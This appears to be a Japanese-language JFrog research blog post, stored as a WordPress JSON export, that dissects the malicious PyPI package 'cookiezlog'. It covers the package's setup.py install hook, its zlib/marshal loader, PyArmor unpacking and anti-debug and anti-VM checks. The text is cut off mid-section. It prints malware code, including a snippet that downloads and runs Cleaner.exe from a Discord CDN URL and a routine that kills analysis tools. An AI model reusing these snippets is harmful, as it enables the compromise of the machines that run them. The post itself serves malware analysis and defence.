{"id":106411,"date":"2022-12-30T05:20:04","date_gmt":"2022-12-30T03:20:04","guid":{"rendered":"https:\/\/jfrog.com\/?p=106411"},"modified":"2022-12-30T05:20:04","modified_gmt":"2022-12-30T03:20:04","slug":"pypi-malware-creators-are-starting-to-employ-anti-debug-techniques","status":"publish","type":"post","link":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/","title":{"rendered":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af"},"content":{"rendered":"<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-105081\" src=\"https:\/\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13155705\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-863x300-1.png\" alt=\"PyPI malware are starting to employ Anti-Debug techniques\" width=\"863\" height=\"300\" \/><\/p>\n<p><a href=\"http:\/\/research.jfrog.com\">JFrog\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ea\u30b5\u30fc\u30c1<\/a>\u30c1\u30fc\u30e0\u306f\u3001\u4eba\u6c17\u306e\u3042\u308b\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\uff08OSS\uff09\u30ea\u30dd\u30b8\u30c8\u30ea\u3092<a href=\"http:\/\/jfrog.com\/xray\">\u81ea\u52d5\u5316\u30c4\u30fc\u30eb<\/a>\u3067\u7d99\u7d9a\u7684\u306b\u76e3\u8996\u3057\u3001\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027\u3084\u60aa\u610f\u306e\u3042\u308b\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u30ea\u30dd\u30b8\u30c8\u30ea\u306e\u30e1\u30f3\u30c6\u30ca\u3084\u3088\u308a\u5e83\u3044\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u306b\u5831\u544a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u624b\u6cd5\u304c\u4f7f\u308f\u308c\u308b\u3053\u3068\u306b\u3088\u308a\u975e\u5e38\u306b\u602a\u3057\u3044\u30d1\u30c3\u30b1\u30fc\u30b8\u306b\u306a\u308a\u307e\u3059\u304c\u3001\u7d4c\u9a13\u304c\u5c11\u306a\u3044\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u304c\u9759\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u3092\u4f7f\u3063\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u6b63\u78ba\u306a\u52d5\u4f5c\u3092\u7406\u89e3\u3067\u304d\u306a\u3044\u3088\u3046\u306b\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306e\u3088\u3046\u306a\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306b\u3042\u308b\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u6700\u8fd1\u3001\u653b\u6483\u8005\u306f\u3055\u3089\u306b\u9032\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u79c1\u305f\u3061\u306f\u6700\u8fd1\u3001\u901a\u5e38\u306e\u96e3\u8aad\u5316\u30c4\u30fc\u30eb\u3084\u30c6\u30af\u30cb\u30c3\u30af\u306b\u52a0\u3048\u3001\uff08\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u3092\u59a8\u5bb3\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u308b\uff09\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30b3\u30fc\u30c9\u3092\u63a1\u7528\u3057\u3066\u3044\u308b\u3068\u601d\u308f\u308c\u308b<strong>cookiezlog<\/strong>\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u691c\u51fa\u3057\u3001\u516c\u958b\u3057\u307e\u3057\u305f\u3002<strong>\u3053\u308c\u306f\uff08\u4ed6\u306b\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u8a18\u4e8b\u542b\u3081\uff09\u79c1\u305f\u3061\u306e\u7814\u7a76\u8005\u30c1\u30fc\u30e0\u304cPyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u3053\u306e\u7a2e\u306e\u9632\u5fa1\u3092\u767a\u898b\u3057\u305f\u6700\u521d\u306e\u4f8b\u3067\u3059\u3002<\/strong><\/p>\n<p>\u3053\u306e\u8a18\u4e8b\u3067\u306f\u3001\u3053\u306ePython\u30de\u30eb\u30a6\u30a7\u30a2\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c6\u30af\u30cb\u30c3\u30af\u306e\u6982\u8981\u3068\u3001\u985e\u4f3c\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u89e3\u51cd\u3059\u308b\u65b9\u6cd5\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h2>\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30c8\u30ea\u30ac\u30fc<\/h2>\n<p>\u60aa\u610f\u306e\u3042\u308b\u307b\u3068\u3093\u3069\u306e\u30d1\u30c3\u30b1\u30fc\u30b8\u3068\u540c\u69d8\u306b\u3001<strong>cookiezlog<\/strong>\u30d1\u30c3\u30b1\u30fc\u30b8\u306f\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3068\u3059\u3050\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u306f setup.py \u306e &#8220;develop&#8221; \u3068 &#8220;install&#8221; \u30c8\u30ea\u30ac\u30fc\u3067\u5b9f\u73fe\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"language-python\"><code>class PostDevelopCommand(develop):\r\n    def run(self):\r\n        execute()\r\n        install.run(self)\r\n \r\n \r\nclass PostInstallCommand(install):\r\n    def run(self):\r\n        execute()\r\n        install.run(self)\r\n \r\n...\r\n \r\nsetup(\r\n    name='cookiezlog',\r\n    version='0.0.1',\r\n    description='Extra Package for Roblox grabbing',\r\n    ...\r\n    cmdclass={\r\n        'develop': PostDevelopCommand,\r\n        'install': PostInstallCommand,\r\n    },\r\n)<\/code><\/pre>\n<h2>\u9759\u7684\u96e3\u8aad\u5316 \u305d\u306e1 &#8211; \u30c8\u30ea\u30d3\u30a2\u30eb\uff08trivial\uff09\u306a\u4f8b<\/h2>\n<p>\u6700\u521d\u306e\u3001\u305d\u3057\u3066\u6700\u3082\u5358\u7d14\u306a\u9632\u5fa1\u30ec\u30a4\u30e4\u30fc\u306fzlib\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30b3\u30fc\u30c9\u3067\u3001\u30d1\u30c3\u30b1\u30fc\u30b8\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u76f4\u5f8c\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"language-python\"><code>def execute():\r\n   import marshal,zlib;exec(marshal.loads(zlib.decompress(b'x\\x9cM\\x90\\xc1J\\xc3@\\x10\\x86\\xeb\\xb5O\\xb1\\xec)\\x01\\xd9\\xdd4I\\x93\\x08=\\x84\\xe0A\\xa8(\\xa1\\x1e&lt;\\x85\\x98\\x0c6hv\\xd7...')))<\/code><\/pre>\n<p>\u89e3\u8aad\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305fURL\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u88ab\u5bb3\u8005\u306e\u30de\u30b7\u30f3\u3067\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"language-python\"><code>URL = \"https:\/\/cdn.discordapp.com\/attachments\/1037723441480089600\/1039359352957587516\/Cleaner.exe\"\r\nresponse = requests.get(URL)\r\nopen(\"Cleaner.exe\", \"wb\").write(response.content)\r\nos.system(\"set __COMPACT_LAYER=RunAsInvoker | start Cleaner.exe\")<\/code><\/pre>\n<p>\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u306fWindows\u306ePE(Portable Executable)\u30d5\u30a1\u30a4\u30eb\u3067\u3059\u3002\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u5185\u306e\u6587\u5b57\u5217\u3092\u898b\u308b\u3068\u3001\u5b9f\u969b\u306e\u30cd\u30a4\u30c6\u30a3\u30d6\u30b3\u30fc\u30c9\u3067\u306f\u306a\u304f\u3001PE\u5f62\u5f0f\u306b\u30d1\u30c3\u30af\u3055\u308c\u305fPython\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002<\/p>\n<pre class=\"language-bash\"><code>$ strings Cleaner.exe | grep 'PyIns'\r\nCannot open PyInstaller archive from executable (%s) or external archive (%s)\r\nPyInstaller: FormatMessageW failed.\r\nPyInstaller: pyi_win32_utils_to_utf8 failed.<\/code><\/pre>\n<p>\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30c4\u30fc\u30eb<a href=\"https:\/\/github.com\/extremecoders-re\/pyinstxtractor\">PyInstaller Extractor<\/a>\u3067\u7d20\u65e9\u304f\u89e3\u51cd\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u89e3\u51cd\u306e\u7d50\u679c\u5f97\u3089\u308c\u308b\u30b3\u30fc\u30c9\u306b\u306f\u3001\u4e3b\u306b\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4e2d\u5fc3\u3068\u3057\u305f\u591a\u304f\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u4e2d\u3067\u6700\u3082\u8208\u5473\u6df1\u3044\u30d5\u30a1\u30a4\u30eb\u306f<strong>main.pyc<\/strong>\u3067\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u30b3\u30fc\u30c9\u3092Python\u306e\u30d0\u30a4\u30c8\u30b3\u30fc\u30c9\u3068\u3057\u3066\u542b\u3093\u3067\u3044\u307e\u3059\u3002<\/p>\n<h2>\u9759\u7684\u96e3\u8aad\u5316 \u305d\u306e2 &#8211; PyArmor\u306e\u30a2\u30f3\u30d1\u30c3\u30af<\/h2>\n<p>\u901a\u5e38\u3001<a href=\"https:\/\/pypi.org\/project\/uncompyle6\/\">uncompyle6<\/a>\u306a\u3069\u306e\u30c4\u30fc\u30eb\u3092\u4f7f\u3063\u3066<strong>main.pyc<\/strong>\u306e\u30d0\u30a4\u30c8\u30b3\u30fc\u30c9\u3092Python\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306b\u9006\u30b3\u30f3\u30d1\u30a4\u30eb\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u308b\u306f\u305a\u3067\u3059\u3002\u3057\u304b\u3057\u3053\u306e\u5834\u5408\u3001main.pyc\u306b\u5bfe\u3057\u3066\u5225\u306e\u6587\u5b57\u5217\u3092\u5b9f\u884c\u3059\u308b\u3068\u3001\u3053\u306e\u30d0\u30a4\u30ca\u30ea\u304c<a href=\"https:\/\/github.com\/dashingsoft\/pyarmor\">PyArmor<\/a>\u3067\u96e3\u8aad\u5316\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002<\/p>\n<pre class=\"language-shell\"><code>pytransformr\r\n__pyarmor__\r\nDist\\obf\\main.py<\/code><\/pre>\n<p>PyArmor\u306f\u5546\u7528\u306e\u30d1\u30c3\u30ab\u30fc(\u5b9f\u884c\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u3092\u5727\u7e2e\u3059\u308b\u3082\u306e)\u304a\u3088\u3073\u96e3\u8aad\u5316\u3059\u308b\u305f\u3081\u306e\u30c4\u30fc\u30eb\u3067\u3001\u5143\u306e\u30b3\u30fc\u30c9\u306b\u96e3\u8aad\u5316\u6280\u8853\u3092\u9069\u7528\u3057\u3066\u6697\u53f7\u5316\u3057\u3001\u89e3\u6790\u304b\u3089\u9632\u5fa1\u3059\u308b\u3082\u306e\u3067\u3059\u3002\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306b\u3068\u3063\u3066\u5e78\u904b\u306a\u3053\u3068\u306b\u3001PyArmor\u306f\u30a4\u30f3\u30c8\u30ed\u30b9\u30da\u30af\u30b7\u30e7\u30f3\u306b\u5fc5\u8981\u306a\u60c5\u5831\u306e\u591a\u304f\u3092\u4fdd\u6301\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3092\u77e5\u3063\u3066\u3044\u308c\u3070\u3001\u5143\u306e\u30b3\u30fc\u30c9\u3067\u4f7f\u308f\u308c\u3066\u3044\u308b\u95a2\u6570\u3084\u5b9a\u6570\u306e\u540d\u524d\u306e\u5fa9\u5143\u3092\u8a66\u307f\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>PyArmor\u306f\u4e00\u822c\u306b\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u30a2\u30f3\u30d1\u30c3\u30ab\u30fc\u3092\u6301\u3061\u307e\u305b\u3093\u304c\u3001\u591a\u5c11\u306e\u624b\u4f5c\u696d\u3067\u5b8c\u5168\u306b\u89e3\u51cd\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u3053\u306e\u30b1\u30fc\u30b9\u3067\u3001\u79c1\u305f\u3061\u306f\u30aa\u30ea\u30b8\u30ca\u30eb\u306e\u30b7\u30f3\u30dc\u30eb\u3068\u6587\u5b57\u5217\u306b\u8208\u5473\u304c\u3042\u3063\u305f\u306e\u3067\u3001\uff08\u30e9\u30a4\u30d6\u30e9\u30ea\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3066\uff09\u7d20\u65e9\u304f\u89e3\u51cd\u3059\u308b\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3092\u9078\u629e\u3057\u307e\u3057\u305f\u3002<\/p>\n<p>\u30d1\u30c3\u30af\u3055\u308c\u305f\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u30b9\u30bf\u30f3\u30c9\u30a2\u30ed\u30fc\u30f3\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u3068\u3057\u3066\u5b9f\u884c\u3057\u3088\u3046\u3068\u3059\u308b\u3068\u3001\u30b7\u30b9\u30c6\u30e0\u306b\u5fc5\u8981\u306a\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u306a\u3044\u3053\u3068\u3092\u6307\u5b9a\u3059\u308b\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002<\/p>\n<pre class=\"language-python\"><code>$ python.exe .\\main.pyc\r\nTraceback (most recent call last):\r\n  File \"&lt;dist\\obf\\main.py&gt;\", line 3, in \r\n  File \"\", line 1, in \r\nModuleNotFoundError: No module named 'psutil'<\/code><\/pre>\n<p>\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306fpsutil\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u63a2\u3059\u306e\u3067\u3001PYTHONPATH\u306e\u3069\u3053\u304b\u306b\u540c\u3058\u540d\u524d\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308c\u3070\u3001\u30d7\u30ed\u30bb\u30b9\u306e\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u3067\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u30d7\u30ed\u30bb\u30b9\u306b\u72ec\u81ea\u306e\u30b3\u30fc\u30c9\u3092\u6ce8\u5165\u3059\u308b\u305f\u3081\u306e\u7c21\u5358\u306a\u30a8\u30f3\u30c8\u30ea\u30dd\u30a4\u30f3\u30c8\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u9632\u5fa1\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\uff08main.pyc\uff09\u3068\u540c\u3058\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306bpsutil.py\u3068\u3044\u3046\u540d\u524d\u306e\u72ec\u81ea\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u4ee5\u4e0b\u306e\u30b3\u30fc\u30c9\u3067\u4f5c\u6210\u3057\u307e\u3057\u305f\u3002<\/p>\n<pre class=\"language-python\"><code>import inspect\r\nfor frame in inspect.stack():\r\n   for c in frame.frame.f_code.co_consts:\r\n       if not inspect.iscode(c):\r\n           continue\r\n       dis.show_code(c)<\/code><\/pre>\n<p>\u3053\u306e\u30b9\u30cb\u30da\u30c3\u30c8\u3067\u306f\u3001\u5b9f\u884c\u4e2d\u306e\u30b3\u30fc\u30c9\u306b\u95a2\u3059\u308b\u5b9f\u884c\u6642\u60c5\u5831\u3092\u53d6\u5f97\u3067\u304d\u308b<strong>inspect<\/strong>\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u3001\u5b9f\u884c\u30d5\u30ec\u30fc\u30e0\u3092\u7e70\u308a\u8fd4\u3057\u3001\u30b3\u30fc\u30c9\u30d6\u30ed\u30c3\u30af\u540d\u3068\u53c2\u7167\u3055\u308c\u308b\u5b9a\u6570\u3092\u62bd\u51fa\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u30b9\u30cb\u30da\u30c3\u30c8\u3092\u5b9f\u884c\u3059\u308b\u3068\u3001\u60aa\u8cea\u306a\u30b3\u30fc\u30c9\u306e\u6a5f\u80fd\u3068\u8d77\u6e90\u3092\u8b58\u5225\u3059\u308b\u305f\u3081\u306e\u6587\u5b57\u5217\u306e\u30ea\u30b9\u30c8\u304c\u8fd4\u3055\u308c\u307e\u3057\u305f\u3002\u6700\u3082\u6ce8\u76ee\u3059\u3079\u304d\u6587\u5b57\u5217\u306f\u3001\u653b\u6483\u8005\u306e\u30ea\u30dd\u30b8\u30c8\u30ea\u3092\u6307\u3059\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u30fb\u30e2\u30b8\u30e5\u30fc\u30eb\u306eURL\u3068\u3001\u30b3\u30fc\u30c9\u5185\u306e\u30a2\u30f3\u30c1VM\u6a5f\u80fd\u3078\u306e\u8a00\u53ca\u3067\u3057\u305f\u3002<\/p>\n<pre class=\"language-shell\"><code>Injector\r\napp-(\\d*\\.\\d*)*) https:\/\/raw.githubusercontent.com\/Syntheticc\/injection1\/main\/injection.js\r\n%WEBHOOK%\r\n%IP%\r\nindex.js\r\ncheck_vm None\r\nVMwareService.exe\r\nVMwareTray.exe<\/code><\/pre>\n<h2>\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u6280\u8853<\/h2>\n<p>\u6587\u5b57\u5217\u306e\u4e2d\u3067\u8a00\u53ca\u3055\u308c\u3066\u3044\u308b<a href=\"https:\/\/github.com\/Syntheticc\">Syntheticc GitHub\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb<\/a>\u306f\u3001\u57f7\u7b46\u6642\u70b9\u3067\u306f\u307e\u3060\u5229\u7528\u53ef\u80fd\u3067\u3057\u305f\u3002\u3053\u306e\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u306e\u30ea\u30dd\u30b8\u30c8\u30ea\u306b\u306f\u3001\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u306e\u30cf\u30c3\u30ad\u30f3\u30b0\u30c4\u30fc\u30eb\u304c\u5927\u91cf\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4e2d\u3067\u3082\u300cAdvanced Anti Debug\u300d\u3068\u547c\u3070\u308c\u308b\u30ea\u30dd\u30b8\u30c8\u30ea\u304c\u3042\u308a\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u89e3\u6790\u3092\u963b\u6b62\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3067\u304d\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-105082\" src=\"https:\/\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13155816\/1_Syntheticc-GitHub-profile.png\" alt=\"Syntheticc GitHub profile\" width=\"1025\" height=\"655\" \/><\/p>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u4f7f\u7528\u3057\u305f\u52d5\u7684\u306a\u624b\u6cd5\u306f\u3001\u300c\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0(Anti-Debug)\u300d\u3068\u300c\u30a2\u30f3\u30c1VM(Anti-VM)\u300d\u306e2\u3064\u306e\u30ab\u30c6\u30b4\u30ea\u30fc\u306b\u5206\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u300c\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u300d\u306f\u3001\u30c7\u30d0\u30c3\u30ac\u3084\u9006\u30a2\u30bb\u30f3\u30d6\u30e9\u306b\u95a2\u9023\u3059\u308b\u4e0d\u5be9\u306a\u30b7\u30b9\u30c6\u30e0\u306e\u6319\u52d5\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u6a5f\u80fd\u3067\u3001\u6b21\u306e\u3088\u3046\u306a\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p><strong>check_processes<\/strong>\u306f\u3001\u30c7\u30d0\u30c3\u30ac\u306e\u30d7\u30ed\u30bb\u30b9\u304c\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u52d5\u4f5c\u3057\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u8abf\u3079\u307e\u3059\u3002\u30a2\u30af\u30c6\u30a3\u30d6\u306a\u30d7\u30ed\u30bb\u30b9\u30ea\u30b9\u30c8\u3068\u3001\u4ee5\u4e0b\u3092\u542b\u3080 50 \u4ee5\u4e0a\u306e\u65e2\u77e5\u306e\u30c4\u30fc\u30eb\u306e\u30ea\u30b9\u30c8\u3092\u6bd4\u8f03\u3057\u307e\u3059\u3002 <\/p>\n<ul>\n<li>\u201cidau64.exe&#8221; (<a href=\"https:\/\/hex-rays.com\/ida-pro\/\">IDA Pro \u9006\u30a2\u30bb\u30f3\u30d6\u30e9<\/a>)<\/li>\n<li>&#8220;x64dbg.exe&#8221; (<a href=\"https:\/\/x64dbg.com\/\">x64dbg \u30c7\u30d0\u30c3\u30ac<\/a>)<\/li>\n<li>&#8220;Windbg.exe\u201d (<a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-hardware\/drivers\/debugger\/debugger-download-tools\">WinDbg \u30c7\u30d0\u30c3\u30ac<\/a>)<\/li>\n<li>\u201cDevenv.exe\u201d (<a href=\"https:\/\/visualstudio.microsoft.com\/\">Visual Studio IDE<\/a>)<\/li>\n<li>\u201cProcesshacker.exe\u201d (<a href=\"https:\/\/processhacker.sourceforge.io\/\">Process Hacker<\/a>)<\/li>\n<\/ul>\n<pre class=\"language-python\"><code>PROCNAMES = [\r\n    \"ProcessHacker.exe\",\r\n    \"httpdebuggerui.exe\",\r\n    \"wireshark.exe\",\r\n    \"fiddler.exe\",\r\n    \"regedit.exe\",\r\n...\r\n]\r\n \r\nfor proc in psutil.process_iter():\r\n    if proc.name() in PROCNAMES:\r\n        proc.kill()\r\n<\/code><\/pre>\n<p><strong>check_research_tools<\/strong>\u306f\u307b\u307c\u540c\u3058\u6a5f\u80fd\u3092\u6301\u3061\u3001\u30d7\u30ed\u30bb\u30b9\u540d\u306e\u4e00\u90e8\u30925\u3064\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u89e3\u6790\u30c4\u30fc\u30eb\u306e\u8cea\u7d20\u306a\u30ea\u30b9\u30c8\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li>\u201cwireshark\u201d (<a href=\"https:\/\/www.wireshark.org\/\">Wireshark \u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30d7\u30ed\u30c8\u30b3\u30eb\u89e3\u6790<\/a>)<\/li>\n<li>\u201cfiddler\u201d (<a href=\"https:\/\/www.telerik.com\/fiddler\">Fiddler \u30d7\u30ed\u30ad\u30b7<\/a>)<\/li>\n<li>\u201chttp\u201d (<a href=\"https:\/\/www.httpdebugger.com\/screenshots.html\">HTTP \u30c7\u30d0\u30c3\u30ac<\/a>\u3001\u304a\u3088\u3073\u305d\u306e\u4ed6\u306e\u30c4\u30fc\u30eb)<\/li>\n<li>\u201ctraffic\u201d (\u4e00\u822c\u7684\u306a\u30bf\u30fc\u30df\u30ca\u30eb)<\/li>\n<li>\u201cpacket\u201d (\u4e00\u822c\u7684\u306a\u30bf\u30fc\u30df\u30ca\u30eb)<\/li>\n<\/ul>\n<p>\u3053\u308c\u3089\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u3044\u305a\u308c\u304b\u304c\u5b9f\u884c\u4e2d\u3067\u3042\u308b\u3053\u3068\u304c\u5224\u660e\u3057\u305f\u5834\u5408\u3001\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30b3\u30fc\u30c9\u306f<a href=\"https:\/\/psutil.readthedocs.io\/en\/latest\/index.html?highlight=terminate#psutil.Process.kill\">psutil.Process.kill<\/a>\u3092\u4ecb\u3057\u3066\u30d7\u30ed\u30bb\u30b9\u3092\u5f37\u5236\u7d42\u4e86\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u975e\u5e38\u306b\u5de7\u5999\u306a\u30a2\u30d7\u30ed\u30fc\u30c1\u3068\u306f\u8a00\u3048\u307e\u305b\u3093\u3002\u30b9\u30c6\u30eb\u30b9\u3092\u3088\u308a\u610f\u8b58\u3057\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u5916\u90e8\u30d7\u30ed\u30bb\u30b9\u3068\u76f8\u4e92\u4f5c\u7528\u3059\u308b\u4ee3\u308f\u308a\u306b\u3001\u4f55\u306e\u8868\u793a\u3082\u306a\u304f\u5b9f\u884c\u3092\u505c\u6b62\u3057\u307e\u3059\u3002<\/p>\n<p>\u305d\u306e\u4ed6\u306e\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u6280\u8853\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u4eee\u60f3\u30de\u30b7\u30f3\u5185\u3067\u5b9f\u884c\u3055\u308c\u3066\u3044\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u3067\u3059\u3002<\/p>\n<p><strong>check_dll<\/strong>\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u304c<a href=\"https:\/\/www.vmware.com\/il\/products\/workstation-pro.html\">VMWare<\/a>\uff08&#8221;vmGuestLib.dll&#8221;\uff09\u3001\u307e\u305f\u306f<a href=\"https:\/\/www.virtualbox.org\/\">VirtualBox<\/a>\uff08&#8221;vboxmrxnp.dll&#8221;\uff09\u30d0\u30fc\u30c1\u30e3\u30eb\u30de\u30b7\u30f3\u306e\u30b2\u30b9\u30c8\u4e0b\u3067\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u3059DLL\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u30eb\u30fc\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p><strong>check_vm<\/strong>\u306f\u3001VMware \u95a2\u9023\u306e\u30d7\u30ed\u30bb\u30b9\u3001\u7279\u306b VMwareService.exe \u3084 VMwareTray.exe 